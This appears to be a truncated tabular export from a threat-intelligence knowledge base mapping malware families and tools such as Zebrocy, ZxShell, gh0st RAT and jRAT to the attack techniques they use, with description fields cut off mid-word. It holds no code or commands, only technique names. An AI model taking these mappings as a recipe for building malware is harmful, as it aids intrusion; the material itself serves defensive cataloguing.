S0658 XCSSET malware-- software uses T1087 Account Diattack-pat technique [XCSSET](ht
S0658 XCSSET malware-- software uses T1560 Archive Coattack-pat technique [XCSSET](ht
S0658 XCSSET malware-- software uses T1554 Compromise attack-pat technique [XCSSET](ht
S0658 XCSSET malware-- software uses T1195.001Compromise attack-pat technique [XCSSET](ht
<code>~/Desktop</code> wi
S0658 XCSSET malware-- software uses T1486 Data Encryattack-pat technique less than 500MB are encrypt
S0658 XCSSET malware-- software uses T1005 Data from attack-pat technique [XCSSET](ht
S0658 XCSSET malware-- software uses T1574.006Dynamic Liattack-pat technique [XCSSET](h
S0658 XCSSET malware-- software uses T1041 Exfiltratio attack-pat technique [XCSSET](ht
S0658 XCSSET malware-- software uses T1068 Exploitatioattack-pat technique [XCSSET](ht
S0658 XCSSET malware-- software uses T1083 File and Di attack-pat technique [XCSSET](ht
S0658 XCSSET malware-- software uses T1056.002GUI Input attack-pat technique [XCSSET](h
S0658 XCSSET malware-- software uses T1553.001Gatekeeperattack-pat technique [XCSSET](ht
S0658 XCSSET malware-- software uses T1564.001Hidden Fileattack-pat technique [XCSSET](h
S0658 XCSSET malware-- software uses T1105 Ingress Tooattack-pat technique [XCSSET](h
S0658 XCSSET malware-- software uses T1543.004Launch Da attack-pat technique [XCSSET](ht
S0658 XCSSET malware-- software uses T1569.001Launchctl attack-pat technique [XCSSET](h
S0658 XCSSET malware-- software uses T1222.002Linux and M attack-pat technique [XCSSET](h
S0658 XCSSET malware-- software uses T1036 Masqueradattack-pat technique [XCSSET](ht
S0658 XCSSET malware-- software uses T1647 Plist File Mattack-pat technique [XCSSET](h
S0658 XCSSET malware-- software uses T1098.004SSH Authorattack-pat technique [XCSSET](ht
S0658 XCSSET malware-- software uses T1113 Screen Capattack-pat technique [XCSSET](ht
S0658 XCSSET malware-- software uses T1518.001Security S attack-pat technique [XCSSET](ht
S0658 XCSSET malware-- software uses T1518 Software Dattack-pat technique [XCSSET](h
S0658 XCSSET malware-- software uses T1539 Steal Web attack-pat technique [XCSSET](h
S0658 XCSSET malware-- software uses T1573.001Symmetric attack-pat technique [XCSSET](ht
S0658 XCSSET malware-- software uses T1082 System Inf attack-pat technique [XCSSET](ht
S0658 XCSSET malware-- software uses T1614.001System Lanattack-pat technique [XCSSET](ht
S0658 XCSSET malware-- software uses T1497.003Time Basedattack-pat technique Using the m
S0658 XCSSET malware-- software uses T1059.004Unix Shell attack-pat technique [XCSSET](h
S0117 XTunnel malware--7software uses T1573.002Asymmetricattack-pat technique [XTunnel](h
S0117 XTunnel malware--7software uses T1027.001Binary Padattack-pat technique A version o
S0117 XTunnel malware--7software uses T1552.001Credentialsattack-pat technique [XTunnel](h
S0117 XTunnel malware--7software uses T1008 Fallback C attack-pat technique The C2 serv
S0117 XTunnel malware--7software uses T1046 Network Seattack-pat technique [XTunnel](h
S0117 XTunnel malware--7software uses T1027 Obfuscatedattack-pat technique A version o
S0117 XTunnel malware--7software uses T1090 Proxy attack-pat technique [XTunnel](h
S0117 XTunnel malware--7software uses T1059.003Windows Cattack-pat technique [XTunnel](
S0341 Xbash malware--6software uses T1053.003Cron attack-pat technique [Xbash](htt
S0341 Xbash malware--6software uses T1485 Data Destrattack-pat technique [Xbash](htt
S0341 Xbash malware--6software uses T1486 Data Encryattack-pat technique [Xbash](ht
S0341 Xbash malware--6software uses T1102.001Dead Dropattack-pat technique [Xbash](htt
S0341 Xbash malware--6software uses T1203 Exploitatioattack-pat technique [Xbash](htt
S0341 Xbash malware--6software uses T1105 Ingress Tooattack-pat technique [Xbash](htt
S0341 Xbash malware--6software uses T1059.007JavaScript attack-pat technique [Xbash](htt
S0341 Xbash malware--6software uses T1218.005Mshta attack-pat technique [Xbash](htt
S0341 Xbash malware--6software uses T1046 Network Seattack-pat technique [Xbash](htt
S0341 Xbash malware--6software uses T1110.001Password Gattack-pat technique [Xbash](htt
S0341 Xbash malware--6software uses T1059.001PowerShellattack-pat technique [Xbash](htt
S0341 Xbash malware--6software uses T1547.001Registry Ruattack-pat technique [Xbash](htt
S0341 Xbash malware--6software uses T1218.010Regsvr32 attack-pat technique [Xbash](htt
S0341 Xbash malware--6software uses T1016 System Netattack-pat technique [Xbash](htt
S0341 Xbash malware--6software uses T1059.005Visual Basiattack-pat technique [Xbash](htt
S0341 Xbash malware--6software uses T1071.001Web Protocattack-pat technique [Xbash](ht
S0388 YAHOYAH malware--csoftware uses T1140 Deobfuscatattack-pat technique [YAHOYAH](
S0388 YAHOYAH malware--csoftware uses T1027.013Encrypted/attack-pat technique [YAHOYAH](h
S0388 YAHOYAH malware--csoftware uses T1105 Ingress Tooattack-pat technique [YAHOYAH](
S0388 YAHOYAH malware--csoftware uses T1518.001Security S attack-pat technique [YAHOYAH](
S0388 YAHOYAH malware--csoftware uses T1082 System Inf attack-pat technique [YAHOYAH](
S0388 YAHOYAH malware--csoftware uses T1071.001Web Protocattack-pat technique [YAHOYAH](
S1114 ZIPLINE malware-- software uses T1562.001Disable or attack-pat technique [ZIPLINE](
S1114 ZIPLINE malware-- software uses T1083 File and Di attack-pat technique [ZIPLINE](
S1114 ZIPLINE malware-- software uses T1105 Ingress Tooattack-pat technique [ZIPLINE](h
S1114 ZIPLINE malware-- software uses T1095 Non-Applicattack-pat technique [ZIPLINE](h
S1114 ZIPLINE malware-- software uses T1057 Process Di attack-pat technique [ZIPLINE](h
S1114 ZIPLINE malware-- software uses T1090 Proxy attack-pat technique [ZIPLINE](h
S1114 ZIPLINE malware-- software uses T1573.001Symmetric attack-pat technique [ZIPLINE](
S1114 ZIPLINE malware-- software uses T1205 Traffic Signattack-pat technique [ZIPLINE](h
S1114 ZIPLINE malware-- software uses T1059.004Unix Shell attack-pat technique [ZIPLINE](h
S0086 ZLib malware-- software uses T1560.002Archive viaattack-pat technique The [ZLib](
S0086 ZLib malware-- software uses T1041 Exfiltratio attack-pat technique [ZLib](http
S0086 ZLib malware-- software uses T1083 File and Di attack-pat technique [ZLib](http
S0086 ZLib malware-- software uses T1105 Ingress Tooattack-pat technique [ZLib](http
S0086 ZLib malware-- software uses T1036.005Match Legiattack-pat technique [ZLib](http
S0086 ZLib malware-- software uses T1113 Screen Capattack-pat technique [ZLib](http
S0086 ZLib malware-- software uses T1082 System Inf attack-pat technique [ZLib](http
S0086 ZLib malware-- software uses T1007 System Serattack-pat technique [ZLib](http
S0086 ZLib malware-- software uses T1071.001Web Protocattack-pat technique [ZLib](http
S0086 ZLib malware-- software uses T1059.003Windows Cattack-pat technique [ZLib](http
S0086 ZLib malware-- software uses T1543.003Windows Se attack-pat technique [ZLib](http
S0251 Zebrocy malware-- software uses T1560 Archive Coattack-pat technique [Zebrocy](h
S0251 Zebrocy malware-- software uses T1573.002Asymmetricattack-pat technique [Zebrocy](h
S0251 Zebrocy malware-- software uses T1119 Automatedattack-pat technique [Zebrocy](h
S0251 Zebrocy malware-- software uses T1056.004Credential attack-pat technique [Zebrocy](h
S0251 Zebrocy malware-- software uses T1555.003Credential attack-pat technique [Zebrocy](h
S0251 Zebrocy malware-- software uses T1140 Deobfuscatattack-pat technique [Zebrocy](h
S0251 Zebrocy malware-- software uses T1041 Exfiltratio attack-pat technique [Zebrocy](
S0251 Zebrocy malware-- software uses T1070.004File Deleti attack-pat technique [Zebrocy](h
S0251 Zebrocy malware-- software uses T1083 File and Di attack-pat technique [Zebrocy](h
S0251 Zebrocy malware-- software uses T1105 Ingress Tooattack-pat technique [Zebrocy](
S0251 Zebrocy malware-- software uses T1074.001Local Data attack-pat technique [Zebrocy](h
S0251 Zebrocy malware-- software uses T1037.001Logon Scri attack-pat technique [Zebrocy](
S0251 Zebrocy malware-- software uses T1071.003Mail Protocattack-pat technique [Zebrocy](h
S0251 Zebrocy malware-- software uses T1135 Network Shattack-pat technique [Zebrocy](h
S0251 Zebrocy malware-- software uses T1120 Peripheral attack-pat technique [Zebrocy](
S0251 Zebrocy malware-- software uses T1057 Process Di attack-pat technique [Zebrocy](
S0251 Zebrocy malware-- software uses T1012 Query Regiattack-pat technique [Zebrocy](
S0251 Zebrocy malware-- software uses T1547.001Registry Ruattack-pat technique [Zebrocy](
S0251 Zebrocy malware-- software uses T1053.005Scheduled attack-pat technique [Zebrocy](h
S0251 Zebrocy malware-- software uses T1113 Screen Capattack-pat technique A variant
S0251 Zebrocy malware-- software uses T1027.002Software Pattack-pat technique [Zebrocy](
S0251 Zebrocy malware-- software uses T1132.001Standard Eattack-pat technique [Zebrocy](
S0251 Zebrocy malware-- software uses T1082 System Inf attack-pat technique [Zebrocy](
S0251 Zebrocy malware-- software uses T1016 System Netattack-pat technique [Zebrocy](
S0251 Zebrocy malware-- software uses T1049 System Netattack-pat technique [Zebrocy](
S0251 Zebrocy malware-- software uses T1033 System Own attack-pat technique [Zebrocy](h
S0251 Zebrocy malware-- software uses T1124 System Timattack-pat technique [Zebrocy](h
S0251 Zebrocy malware-- software uses T1071.001Web Protocattack-pat technique [Zebrocy](
S0251 Zebrocy malware-- software uses T1059.003Windows Cattack-pat technique [Zebrocy](
S0251 Zebrocy malware-- software uses T1047 Windows M attack-pat technique One variant
S1151 ZeroClearemalware-- software uses T1553.002Code Signi attack-pat technique [ZeroClear
S1151 ZeroClearemalware-- software uses T1059 Command attack-pat
an technique [ZeroClear
S1151 ZeroClearemalware-- software uses T1561.002Disk Struc attack-pat technique [ZeroClear
S1151 ZeroClearemalware-- software uses T1068 Exploitatioattack-pat technique [ZeroClear
S1151 ZeroClearemalware-- software uses T1070.004File Deleti attack-pat technique [ZeroCleare
S1151 ZeroClearemalware-- software uses T1106 Native API attack-pat technique [ZeroClear
S1151 ZeroClearemalware-- software uses T1059.001PowerShellattack-pat technique [ZeroClear
S1151 ZeroClearemalware-- software uses T1082 System Inf attack-pat technique [ZeroClear
S0230 ZeroT malware-- software uses T1027.001Binary Padattack-pat technique [ZeroT](htt
S0230 ZeroT malware-- software uses T1548.002Bypass Useattack-pat technique Many [ZeroT
S0230 ZeroT malware-- software uses T1574.002DLL Side-L attack-pat technique [ZeroT](htt
S0230 ZeroT malware-- software uses T1140 Deobfuscatattack-pat technique [ZeroT](ht
S0230 ZeroT malware-- software uses T1027.013Encrypted/attack-pat technique [ZeroT](htt
S0230 ZeroT malware-- software uses T1105 Ingress Tooattack-pat technique [ZeroT](htt
S0230 ZeroT malware-- software uses T1027.002Software Pattack-pat technique Some [ZeroT
S0230 ZeroT malware-- software uses T1001.002Steganogr attack-pat technique [ZeroT](htt
S0230 ZeroT malware-- software uses T1573.001Symmetric attack-pat technique [ZeroT](htt
S0230 ZeroT malware-- software uses T1082 System Inf attack-pat technique [ZeroT](htt
S0230 ZeroT malware-- software uses T1016 System Netattack-pat technique [ZeroT](htt
S0230 ZeroT malware-- software uses T1071.001Web Protocattack-pat technique [ZeroT](htt
S0230 ZeroT malware-- software uses T1543.003Windows Se attack-pat technique [ZeroT](htt
S0027 Zeroaccessmalware-- software uses T1564.004NTFS File Aattack-pat technique Some varian
S0027 Zeroaccessmalware-- software uses T1014 Rootkit attack-pat technique [Zeroaccess
S0330 Zeus Pandamalware--1software uses T1115 Clipboard attack-pat technique [Zeus Panda
S0330 Zeus Pandamalware--1software uses T1027.010Command aOttack-pat technique [Zeus Panda
S0330 Zeus Pandamalware--1software uses T1059 Command attack-pat
an technique [Zeus Panda
S0330 Zeus Pandamalware--1software uses T1056.004Credential attack-pat technique [Zeus Pand
S0330 Zeus Pandamalware--1software uses T1140 Deobfuscatattack-pat technique [Zeus Panda
S0330 Zeus Pandamalware--1software uses T1027.013Encrypted/attack-pat technique [Zeus Panda
S0330 Zeus Pandamalware--1software uses T1070.004File Deleti attack-pat technique [Zeus Panda
S0330 Zeus Pandamalware--1software uses T1083 File and Di attack-pat technique [Zeus Panda
S0330 Zeus Pandamalware--1software uses T1105 Ingress Tooattack-pat technique [Zeus Pand
S0330 Zeus Pandamalware--1software uses T1056.001Keyloggingattack-pat technique [Zeus Pand
S0330 Zeus Pandamalware--1software uses T1112 Modify Regattack-pat technique [Zeus Panda
S0330 Zeus Pandamalware--1software uses T1055.002Portable Exattack-pat technique [Zeus Panda
S0330 Zeus Pandamalware--1software uses T1059.001PowerShellattack-pat technique [Zeus Pand
S0330 Zeus Pandamalware--1software uses T1057 Process Di attack-pat technique [Zeus Pand
S0330 Zeus Pandamalware--1software uses T1012 Query Regiattack-pat technique [Zeus Panda
S0330 Zeus Pandamalware--1software uses T1547.001Registry Ruattack-pat technique [Zeus Panda
S0330 Zeus Pandamalware--1software uses T1113 Screen Capattack-pat technique [Zeus Pand
S0330 Zeus Pandamalware--1software uses T1518.001Security S attack-pat technique [Zeus Panda
S0330 Zeus Pandamalware--1software uses T1082 System Inf attack-pat technique [Zeus Pand
S0330 Zeus Pandamalware--1software uses T1614.001System Lanattack-pat technique [Zeus Pand
S0330 Zeus Pandamalware--1software uses T1124 System Timattack-pat technique [Zeus Panda
S0330 Zeus Pandamalware--1software uses T1071.001Web Protocattack-pat technique [Zeus Pand
S0330 Zeus Pandamalware--1software uses T1059.003Windows Cattack-pat technique [Zeus Pand
S0672 Zox malware-- software uses T1005 Data from attack-pat technique [Zox](https
S0672 Zox malware-- software uses T1027.013Encrypted/attack-pat technique [Zox](http
S0672 Zox malware-- software uses T1068 Exploitatioattack-pat technique [Zox](https
S0672 Zox malware-- software uses T1083 File and Di attack-pat technique [Zox](http
S0672 Zox malware-- software uses T1105 Ingress Tooattack-pat technique [Zox](http
S0672 Zox malware-- software uses T1057 Process Di attack-pat technique [Zox](https
S0672 Zox malware-- software uses T1021.002SMB/Windo attack-pat technique [Zox](https
S0672 Zox malware-- software uses T1001.002Steganogr attack-pat technique [Zox](https
S0672 Zox malware-- software uses T1082 System Inf attack-pat technique [Zox](https
S0412 ZxShell malware-- software uses T1070.001Clear Windattack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1134.002Create Proattack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1056.004Credential attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1005 Data from attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1562.004Disable or attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1562.001Disable or attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1055.001Dynamic-linattack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1499 Endpoint De attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1190 Exploit Pubattack-pat technique [ZxShell](
S0412 ZxShell malware-- software uses T1070.004File Deleti attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1071.002File Transf attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1083 File and Di attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1105 Ingress Tooattack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1056.001Keyloggingattack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1136.001Local Acco attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1112 Modify Regattack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1106 Native API attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1046 Network Seattack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1571 Non-Standaattack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1057 Process Di attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1090 Proxy attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1012 Query Regiattack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1021.001Remote Des attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1218.011Rundll32 attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1113 Screen Capattack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1569.002Service Ex attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1082 System Inf attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1033 System Own attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1007 System Serattack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1021.005VNC attack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1125 Video Captattack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1071.001Web Protocattack-pat technique [ZxShell](h
S0412 ZxShell malware-- software uses T1059.003Windows Cattack-pat technique [ZxShell](
S0412 ZxShell malware-- software uses T1543.003Windows Se attack-pat technique [ZxShell](h
S1013 ZxxZ malware--9software uses T1005 Data from attack-pat technique [ZxxZ](http
S1013 ZxxZ malware--9software uses T1140 Deobfuscatattack-pat technique [ZxxZ](http
S1013 ZxxZ malware--9software uses T1027.013Encrypted/attack-pat technique [ZxxZ](http
S1013 ZxxZ malware--9software uses T1105 Ingress Tooattack-pat technique [ZxxZ](http
S1013 ZxxZ malware--9software uses T1204.002Malicious Fattack-pat technique [ZxxZ](http
S1013 ZxxZ malware--9software uses T1036.004Masquerade attack-pat technique [ZxxZ](http
S1013 ZxxZ malware--9software uses T1106 Native API attack-pat technique [ZxxZ](http
S1013 ZxxZ malware--9software uses T1057 Process Di attack-pat technique [ZxxZ](http
S1013 ZxxZ malware--9software uses T1012 Query Regiattack-pat technique [ZxxZ](http
S1013 ZxxZ malware--9software uses T1053.005Scheduled attack-pat technique [ZxxZ](http
S1013 ZxxZ malware--9software uses T1518.001Security S attack-pat technique [ZxxZ](http
S1013 ZxxZ malware--9software uses T1566.001Spearphishattack-pat technique [ZxxZ](http
S1013 ZxxZ malware--9software uses T1082 System Inf attack-pat technique [ZxxZ](htt
S1013 ZxxZ malware--9software uses T1033 System Own attack-pat technique [ZxxZ](http
S0202 adbupd malware-- software uses T1573.002Asymmetricattack-pat technique [adbupd](ht
S0202 adbupd malware-- software uses T1059.003Windows Cattack-pat technique [adbupd](h
S0202 adbupd malware-- software uses T1546.003Windows Ma attack-pat technique [adbupd](ht
S0110 at tool--0c84 software uses T1053.002At attack-pat technique [at](https:
S0471 build_dowmalware--dsoftware uses T1105 Ingress Tooattack-pat technique [build_down
S0471 build_dowmalware--dsoftware uses T1036.004Masquerade attack-pat technique [build_down
S0471 build_dowmalware--dsoftware uses T1106 Native API attack-pat technique [build_dow
S0471 build_dowmalware--dsoftware uses T1547.001Registry Ruattack-pat technique [build_down
S0471 build_dowmalware--dsoftware uses T1518.001Security S attack-pat technique [build_down
S0471 build_dowmalware--dsoftware uses T1027.003Steganogr attack-pat technique [build_dow
S0471 build_dowmalware--dsoftware uses T1082 System Inf attack-pat technique [build_down
S0471 build_dowmalware--dsoftware uses T1124 System Timattack-pat technique [build_down
S1043 ccf32 malware-- software uses T1560.001Archive viaattack-pat technique [ccf32](htt
S1043 ccf32 malware-- software uses T1119 Automatedattack-pat technique [ccf32](ht
S1043 ccf32 malware-- software uses T1005 Data from attack-pat technique [ccf32](ht
S1043 ccf32 malware-- software uses T1048.003Exfiltrati attack-pat technique [ccf32](ht
S1043 ccf32 malware-- software uses T1070.004File Deleti attack-pat technique [ccf32](ht
S1043 ccf32 malware-- software uses T1083 File and Di attack-pat technique [ccf32](htt
S1043 ccf32 malware-- software uses T1564.001Hidden Fileattack-pat technique [ccf32](htt
S1043 ccf32 malware-- software uses T1074.001Local Data attack-pat technique [ccf32](htt
S1043 ccf32 malware-- software uses T1074.002Remote Datattack-pat technique [ccf32](ht
S1043 ccf32 malware-- software uses T1053.005Scheduled attack-pat technique [ccf32](ht
S1043 ccf32 malware-- software uses T1124 System Timattack-pat technique [ccf32](ht
S1043 ccf32 malware-- software uses T1059.003Windows Cattack-pat technique [ccf32](ht
S0160 certutil tool--0a68 software uses T1560.001Archive viaattack-pat technique [certutil](
S0160 certutil tool--0a68 software uses T1140 Deobfuscatattack-pat technique [certutil](
S0160 certutil tool--0a68 software uses T1105 Ingress Tooattack-pat technique [certutil](
S0160 certutil tool--0a68 software uses T1553.004Install Rootattack-pat technique [certutil](
S0106 cmd tool--bba software uses T1070.004File Deleti attack-pat technique [cmd](https
S0106 cmd tool--bba software uses T1083 File and Di attack-pat technique [cmd](https
S0106 cmd tool--bba software uses T1105 Ingress Tooattack-pat technique [cmd](https
S0106 cmd tool--bba software uses T1570 Lateral Tooattack-pat technique [cmd](https
S0106 cmd tool--bba software uses T1082 System Inf attack-pat technique [cmd](https
S0106 cmd tool--bba software uses T1059.003Windows Cattack-pat technique [cmd](https
S0472 down_newmalware-- software uses T1083 File and Di attack-pat technique [down_new](
S0472 down_newmalware-- software uses T1105 Ingress Tooattack-pat technique [down_new]
S0472 down_newmalware-- software uses T1057 Process Di attack-pat technique [down_new]
S0472 down_newmalware-- software uses T1518.001Security S attack-pat technique [down_new]
S0472 down_newmalware-- software uses T1518 Software Dattack-pat technique [down_new](
S0472 down_newmalware-- software uses T1132.001Standard Eattack-pat technique [down_new]
S0472 down_newmalware-- software uses T1573.001Symmetric attack-pat technique [down_new]
S0472 down_newmalware-- software uses T1082 System Inf attack-pat technique [down_new]
S0472 down_newmalware-- software uses T1016 System Netattack-pat technique [down_new]
S0472 down_newmalware-- software uses T1071.001Web Protocattack-pat technique [down_new]
S0105 dsquery tool--3895 software uses T1087.002Domain Acattack-pat technique [dsquery](
S0105 dsquery tool--3895 software uses T1069.002Domain Grattack-pat technique [dsquery](
S0105 dsquery tool--3895 software uses T1482 Domain Truattack-pat technique [dsquery](h
S0105 dsquery tool--3895 software uses T1082 System Inf attack-pat technique [dsquery](h
S0404 esentutl tool--c25 software uses T1005 Data from attack-pat technique [esentutl](
S0404 esentutl tool--c25 software uses T1006 Direct Vol attack-pat technique [esentutl](
S0404 esentutl tool--c25 software uses T1105 Ingress Tooattack-pat technique [esentutl](
S0404 esentutl tool--c25 software uses T1570 Lateral Tooattack-pat technique [esentutl](
S0404 esentutl tool--c25 software uses T1003.003NTDS attack-pat technique [esentutl](
S0404 esentutl tool--c25 software uses T1564.004NTFS File Aattack-pat technique [esentutl](
S0095 ftp tool--cf23 software uses T1048.003Exfiltrati attack-pat technique [ftp](https
S0095 ftp tool--cf23 software uses T1105 Ingress Tooattack-pat technique [ftp](https
S0095 ftp tool--cf23 software uses T1570 Lateral Tooattack-pat technique [ftp](https
S0032 gh0st RAT malware-- software uses T1070.001Clear Windattack-pat technique [gh0st RAT]
S0032 gh0st RAT malware-- software uses T1059 Command attack-pat
an technique [gh0st RAT]
S0032 gh0st RAT malware-- software uses T1574.002DLL Side-L attack-pat technique A [gh0st RA
S0032 gh0st RAT malware-- software uses T1140 Deobfuscatattack-pat technique [gh0st RAT]
S0032 gh0st RAT malware-- software uses T1573 Encrypted attack-pat technique [gh0st RAT
S0032 gh0st RAT malware-- software uses T1568.001Fast Flux attack-pat technique [gh0st RAT]
S0032 gh0st RAT malware-- software uses T1070.004File Deleti attack-pat technique [gh0st RAT]
S0032 gh0st RAT malware-- software uses T1105 Ingress Tooattack-pat technique [gh0st RAT]
S0032 gh0st RAT malware-- software uses T1056.001Keyloggingattack-pat technique [gh0st RAT]
S0032 gh0st RAT malware-- software uses T1112 Modify Regattack-pat technique [gh0st RAT]
S0032 gh0st RAT malware-- software uses T1106 Native API attack-pat technique [gh0st RAT
S0032 gh0st RAT malware-- software uses T1095 Non-Applicattack-pat technique [gh0st RAT
S0032 gh0st RAT malware-- software uses T1057 Process Di attack-pat technique [gh0st RAT]
S0032 gh0st RAT malware-- software uses T1055 Process Injattack-pat technique [gh0st RAT
S0032 gh0st RAT malware-- software uses T1012 Query Regiattack-pat technique [gh0st RAT]
S0032 gh0st RAT malware-- software uses T1547.001Registry Ruattack-pat technique [gh0st RAT]
S0032 gh0st RAT malware-- software uses T1218.011Rundll32 attack-pat technique A [gh0st RA
S0032 gh0st RAT malware-- software uses T1113 Screen Capattack-pat technique [gh0st RAT]
S0032 gh0st RAT malware-- software uses T1569.002Service Ex attack-pat technique [gh0st RAT]
S0032 gh0st RAT malware-- software uses T1129 Shared Moattack-pat technique [gh0st RAT
S0032 gh0st RAT malware-- software uses T1132.001Standard Eattack-pat technique [gh0st RAT
S0032 gh0st RAT malware-- software uses T1573.001Symmetric attack-pat technique [gh0st RAT]
S0032 gh0st RAT malware-- software uses T1082 System Inf attack-pat technique [gh0st RAT]
S0032 gh0st RAT malware-- software uses T1543.003Windows Se attack-pat technique [gh0st RAT]
S0008 gsecdump tool--b07c software uses T1003.004LSA Secret attack-pat technique [gsecdump]
S0008 gsecdump tool--b07c software uses T1003.002Security A attack-pat technique [gsecdump]
S0071 hcdLoadermalware--9software uses T1059.003Windows Cattack-pat technique [hcdLoader
S0071 hcdLoadermalware--9software uses T1543.003Windows Se attack-pat technique [hcdLoader]
S0068 httpclient malware-- software uses T1573.001Symmetric attack-pat technique [httpclient
S0068 httpclient malware-- software uses T1071.001Web Protocattack-pat technique [httpclient
S0068 httpclient malware-- software uses T1059.003Windows Cattack-pat technique [httpclient
S0278 iKitten malware-- software uses T1560.001Archive viaattack-pat technique [iKitten](h
S0278 iKitten malware-- software uses T1056.002GUI Input attack-pat technique [iKitten](h
S0278 iKitten malware-- software uses T1564.001Hidden Fileattack-pat technique [iKitten](h
S0278 iKitten malware-- software uses T1555.001Keychain attack-pat technique [iKitten](h
S0278 iKitten malware-- software uses T1057 Process Di attack-pat technique [iKitten](h
S0278 iKitten malware-- software uses T1037.004RC Scripts attack-pat technique [iKitten](h
S0278 iKitten malware-- software uses T1016 System Netattack-pat technique [iKitten](h
S0101 ifconfig tool--362dsoftware uses T1016 System Netattack-pat technique [ifconfig](
S0100 ipconfig tool--294 software uses T1016 System Netattack-pat technique [ipconfig](
S0283 jRAT malware--esoftware uses T1123 Audio Captattack-pat technique [jRAT](htt
S0283 jRAT malware--esoftware uses T1115 Clipboard attack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1552.001Credentialsattack-pat technique [jRAT](htt
S0283 jRAT malware--esoftware uses T1555.003Credential attack-pat technique [jRAT](htt
S0283 jRAT malware--esoftware uses T1070.004File Deleti attack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1083 File and Di attack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1105 Ingress Tooattack-pat technique [jRAT](htt
S0283 jRAT malware--esoftware uses T1059.007JavaScript attack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1056.001Keyloggingattack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1027 Obfuscatedattack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1120 Peripheral attack-pat technique [jRAT](htt
S0283 jRAT malware--esoftware uses T1552.004Private Keyattack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1057 Process Di attack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1090 Proxy attack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1021.001Remote Des attack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1029 Scheduled attack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1113 Screen Capattack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1518.001Security S attack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1027.002Software Pattack-pat technique [jRAT](htt
S0283 jRAT malware--esoftware uses T1037.005Startup It attack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1082 System Inf attack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1016 System Netattack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1049 System Netattack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1007 System Serattack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1125 Video Captattack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1059.005Visual Basiattack-pat technique [jRAT](http
S0283 jRAT malware--esoftware uses T1059.003Windows Cattack-pat technique [jRAT](htt
S0283 jRAT malware--esoftware uses T1047 Windows M attack-pat technique [jRAT](http
S1048 macOS.OSAmalware-- software uses T1059.002AppleScripattack-pat technique [macOS.OSAM
S1048 macOS.OSAmalware-- software uses T1562.001Disable or attack-pat technique [macOS.OSAM
S1048 macOS.OSAmalware-- software uses T1027.009Embeddedattack-pat technique [macOS.OSA
S1048 macOS.OSAmalware-- software uses T1105 Ingress Tooattack-pat technique [macOS.OSA
S1048 macOS.OSAmalware-- software uses T1543.001Launch Ageattack-pat technique [macOS.OSAM
S1048 macOS.OSAmalware-- software uses T1569.001Launchctl attack-pat technique [macOS.OSAM
S1048 macOS.OSAmalware-- software uses T1057 Process Di attack-pat technique [macOS.OSAM
S1048 macOS.OSAmalware-- software uses T1027.008Stripped P attack-pat technique [macOS.OSAM
S1048 macOS.OSAmalware-- software uses T1497.001System Cheattack-pat technique [macOS.OSAM
S1048 macOS.OSAmalware-- software uses T1082 System Inf attack-pat technique [macOS.OSAM
S0175 meek tool--6537 software uses T1090.004Domain Froattack-pat technique [meek](http
S1059 metaMain malware-- software uses T1560.003Archive vi attack-pat technique [metaMain](
S1059 metaMain malware-- software uses T1574.002DLL Side-L attack-pat technique [metaMain]
S1059 metaMain malware-- software uses T1005 Data from attack-pat technique [metaMain]
S1059 metaMain malware-- software uses T1140 Deobfuscatattack-pat technique [metaMain]
S1059 metaMain malware-- software uses T1027.013Encrypted/attack-pat technique [metaMain]
S1059 metaMain malware-- software uses T1041 Exfiltratio attack-pat technique [metaMain](
S1059 metaMain malware-- software uses T1070.004File Deleti attack-pat technique [metaMain](
S1059 metaMain malware-- software uses T1083 File and Di attack-pat technique [metaMain](
S1059 metaMain malware-- software uses T1105 Ingress Tooattack-pat technique [metaMain]
S1059 metaMain malware-- software uses T1056 Input Capt attack-pat technique [metaMain]
S1059 metaMain malware-- software uses T1090.001Internal Prattack-pat technique [metaMain]
